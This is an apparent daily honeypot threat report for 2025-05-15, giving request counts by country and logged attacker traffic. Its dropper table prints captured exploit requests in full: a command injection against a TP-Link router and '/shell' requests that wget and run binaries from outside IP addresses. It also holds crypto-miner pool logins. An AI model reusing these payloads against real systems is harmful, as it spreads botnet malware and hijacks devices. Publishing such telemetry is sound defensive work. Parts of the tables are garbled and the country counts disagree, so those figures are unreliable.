Skip to main content
  1. Daily-Posts/

Report: 2025-05-15

·368 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-15
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 13 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1169 requests were recorded during the day, originating from 4 different countries, with a peak of 211 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRGermany
USDubai
PTDubai

botnet_dropper_behaviour
#

remote_addrrequest
163.142.101.240GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
141.98.11.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
85.185.13.76GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
152.0.28.63GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1581{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x224ABPhRUtt95XoACQPdJ4k5Ugp4Z8FEuYkEFSVchqoBMReRPvQWQCtLX4fGMww6TEJtDefUrowxB3tjFNsun8qgejUWPdPKR\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
1921POST /api/user/binLookup?time=1747278853145799409 HTTP/1.1
2041GET /Crm HTTP/1.1
2051GET /Media HTTP/1.1
2061GET /Server HTTP/1.1
2071GET /Staging HTTP/1.1
2101GET /App HTTP/1.1
2111GET /Vendor HTTP/1.1
2261GET /config/index?time=1747278801226420534 HTTP/1.1
2271GET /api/bin/440393?time=1747278852117857625 HTTP/1.1
2281{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x224AosXe5cigwfojMo7reEvxNXqkzGsvpXciqd6auk2B468gQUTFk6fDZ3mivf37r2iRdzUtchvWXd5T6G25ZZXK9YU4MTmHn\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
2291{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x2261ea3ea5eeb08d6e85660cf1a2d78845eef81d\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
2871{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x63e30fb0c44a9d51dfa44ae05a7fb73ecb15ab00\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}

country_iso_code
#

number_of_occurencecountry_iso_code
0211US
1150GB
2120BG
384PL
465SG
555KR
653NL
751VN
848CN
945PT
1038ES
1138SC
1237DE
1335CA
1419HK
1517FR
1614IN
1713AZ
189IL
198GH
208RU
217LT
226MN
236BE
245UA
254EE
263JP
273AR
282PY
292MD
302BR
312KW
322IR
331SY
341MC
351ID
361IT
371AO
381DO
391AT

Related

Report: 2025-05-14
·403 words
Repport Daily
Report: 2025-05-13
·323 words
Repport Daily
Report: 2025-05-12
·494 words
Repport Daily